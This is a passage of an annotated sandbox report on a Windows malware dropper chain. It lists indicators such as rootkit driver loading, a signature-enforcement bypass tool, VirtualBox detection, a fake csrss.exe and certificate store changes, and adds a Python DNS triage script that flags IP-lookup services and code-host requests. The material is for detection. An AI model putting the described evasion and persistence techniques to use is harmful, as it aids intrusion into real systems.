N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
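The two network tables above list only domains, with no process column. iplogger.org and ip-api.com have essentially no business use on an endpoint, while raw.githubusercontent.com and bitbucket.org are legitimate services that loaders use for payload delivery, so they can only be judged by which process asked for them. The following is an added example (not part of the sandbox report) of that triage over DNS events: a flat rule for the IP-lookup services, a context rule for the code hosts, and an escalation when one untrusted image does both, the "geolocate, then fetch" pattern this section shows. Because the report does not record the querying process, the timestamps and image paths in the constructed events are this example's own and shaped like Sysmon Event ID 22 fields; the severities are also this example's assumption.

```python
"""Triage DNS queries (image, query name) against the service categories in this
report's network section. Added example, not part of the sandbox report."""

# Assumption of this example: no legitimate endpoint use for these services.
IP_LOOKUP_SERVICES = ("ip-api.com", "iplogger.org")
# Legitimate hosts that loaders also abuse; only suspicious in context.
CODE_HOSTS = ("raw.githubusercontent.com", "bitbucket.org", "github.com")
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\programdata\\", "\\users\\public\\")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def domain_matches(query, domains):
    """True when query equals one of domains or is a subdomain of one."""
    q = query.lower().rstrip(".")
    return any(q == d or q.endswith("." + d) for d in domains)


def image_is_untrusted(image):
    """Image in a user-writable dir, or under C:\\Windows but outside the system dirs."""
    p = image.lower()
    if any(marker in p for marker in USER_WRITABLE):
        return True
    return p.startswith("c:\\windows\\") and not p.startswith(SYSTEM_DIRS)


def classify_query(image, query):
    """Return (severity, category), or None for queries outside both lists."""
    if domain_matches(query, IP_LOOKUP_SERVICES):
        return "high", "ip-lookup"
    if domain_matches(query, CODE_HOSTS):
        return ("medium" if image_is_untrusted(image) else "info"), "code-host"
    return None


def triage_dns(events):
    """events: iterable of (timestamp, image, query). One finding per hit; an
    untrusted image that both geolocates itself and pulls from a code host is
    escalated to critical."""
    findings = []
    categories = {}
    for ts, image, query in events:
        verdict = classify_query(image, query)
        if verdict is None:
            continue
        severity, category = verdict
        findings.append({"ts": ts, "image": image, "query": query,
                         "severity": severity, "category": category})
        categories.setdefault(image, set()).add(category)
    for f in findings:
        if {"ip-lookup", "code-host"} <= categories[f["image"]] and image_is_untrusted(f["image"]):
            f["severity"] = "critical"
    return findings


# Constructed events: the domains are from this report, the images are illustrative.
EVENTS = [
    ("2024-11-07T05:21:40Z", r"C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a0affb29d.exe", "ip-api.com"),
    ("2024-11-07T05:21:41Z", r"C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a0affb29d.exe", "raw.githubusercontent.com"),
    ("2024-11-07T05:21:50Z", r"C:\Program Files\Git\mingw64\bin\git-remote-https.exe", "bitbucket.org"),
    ("2024-11-07T05:22:05Z", r"C:\Windows\rss\csrss.exe", "iplogger.org"),
    ("2024-11-07T05:22:06Z", r"C:\Windows\System32\svchost.exe", "ctldl.windowsupdate.com"),
]

if __name__ == "__main__":
    for f in triage_dns(EVENTS):
        print(f"{f['severity']:<9}{f['category']:<10}{f['query']:<28}{f['image']}")
```

Blocking the code hosts outright is rarely an option, which is why the rule keys on the requesting image; blocking the IP-lookup services at the resolver is usually cheap and removes the loader's geofencing step.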

Looks up geolocation information via web service

Manipulates WinMon driver.

rootkit evasion
\??\WinMon is an object-manager device name, not a file path, so C:\Windows\rss\csrss.exe is opening a handle to a loaded kernel driver: the Winmon.sys it wrote to C:\Windows\system32\drivers (Drops file in Drivers directory, above). Read with the LoadsDriver and PatchGuard entries in the summary, this is the rootkit stage being loaded and driven from user mode. The dsefix.exe launched from C:\Users\Admin\AppData\Local\Temp\csrss (Executes dropped EXE) carries the name of a public Driver Signature Enforcement bypass, consistent with getting an unsigned driver loaded.
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Same pattern for the \??\WinMonFS device name, opened by the same C:\Windows\rss\csrss.exe. Only Winmon.sys appears in the Drops file in Drivers directory table, so the driver exposing this second device is not identified in this section.
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

The indicator below is \??\VBoxMiniRdrDN, the device name of the VirtualBox shared-folder mini-redirector, not a DLL: Wed1095e8d3cef4ec773.exe probes for it to detect a VirtualBox guest. The probe did not stop it on this platform, since the same process goes on to drop C:\Windows\rss\csrss.exe (Drops file in Windows directory).
Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A

Drops file in Program Files directory

Two installers are at work in C:\Program Files (x86)\Gparted. Wed10b607271059cb7.tmp is an Inno Setup installer (the is-*.tmp files and unins000.dat are Inno artefacts) that lays down Build.sfx.exe and gimagex.exe; Build.sfx.exe is then a WinRAR self-extractor (the __tmp_rar_sfx_access_check_<n> file is the SFX module's write-access probe) that unpacks Build.exe, both of which run later (Executes dropped EXE). The three rows naming Windows PowerShell.lnk contain a literal, unexpanded %ProgramData% joined onto the Gparted directory, so that path does not exist as written and no real Start Menu shortcut was modified; treat those rows as noise from the powershell.exe runs.
Description Indicator Process Target
File created C:\Program Files (x86)\Gparted\__tmp_rar_sfx_access_check_259462750 C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File created C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Program Files (x86)\Gparted\is-4AT79.tmp C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\is-1LHNO.tmp C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\is-5LKQ5.tmp C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.sfx.exe C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\gimagex.exe C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A

Drops file in Windows directory

The CbsPersist_*.cab row is makecab.exe rotating the Windows servicing log under C:\Windows\Logs\CBS and is unrelated to the sample. The drop that matters is C:\Windows\rss\csrss.exe, written by Wed1095e8d3cef4ec773.exe into a new directory under C:\Windows so the system-process name looks legitimate in a process list; it is the same file the ProudDarkness Run key launches and the Defender path exclusion for C:\Windows\rss protects.
Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20241107052120.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
The three rows are netsh.exe opening, querying and enumerating HKLM\SOFTWARE\Microsoft\NetSh, which it does at every start to locate its registered helper DLLs. No value is written to that key in this detonation, so the rows are a by-product of the netsh run logged under Modifies Windows Firewall rather than evidence of helper-DLL persistence; a real case would show a Set value under that key pointing at a DLL outside System32.
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Processes open HKLM\SYSTEM\ControlSet001\Control\NLS\Language during normal locale initialisation, so cmd.exe, taskkill.exe, powershell.exe and the installer binaries all appear here. Read the table as an inventory of what ran (note mshta.exe, odbcconf.exe, taskkill.exe and the Gparted binaries alongside the Wed10* droppers) rather than as a discovery indicator in its own right.
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10b607271059cb7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\rss\csrss.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\gimagex.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed101f2195049.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a0affb29d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-RCU3S.tmp\Wed10fa57e769925f6.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-PST3N.tmp\Wed10fa57e769925f6.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\odbcconf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1015ba90d2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\Build.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-C6M02.tmp\Wed101f2195049.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
mshta.exe hosts the Internet Explorer engine and creates Software\Microsoft\Internet Explorer\Main as part of that engine's initialisation, so the key creation itself is not a settings change. What is worth following up is that mshta.exe ran at all (three launches in the System Language Discovery table), not this key.
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies data under HKEY_USERS

Nearly every row is a MuiCache string cached under \REGISTRY\USER\.DEFAULT: time-zone display names pulled from tzres.dll by Wed1095e8d3cef4ec773.exe, and NAP client descriptions resolved by netsh.exe. Those are side effects of resolving localised resource strings and carry no signal. The two Key created rows for ...\Software\Policies\Microsoft\SystemCertificates\CA and ...\CA\Certificates by C:\Windows\rss\csrss.exe are the ones to keep: they are the activity behind "Modifies system certificate store" in the summary and create the policy-scoped CA store a certificate would be added to; the certificate itself is not recorded in this section.
Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
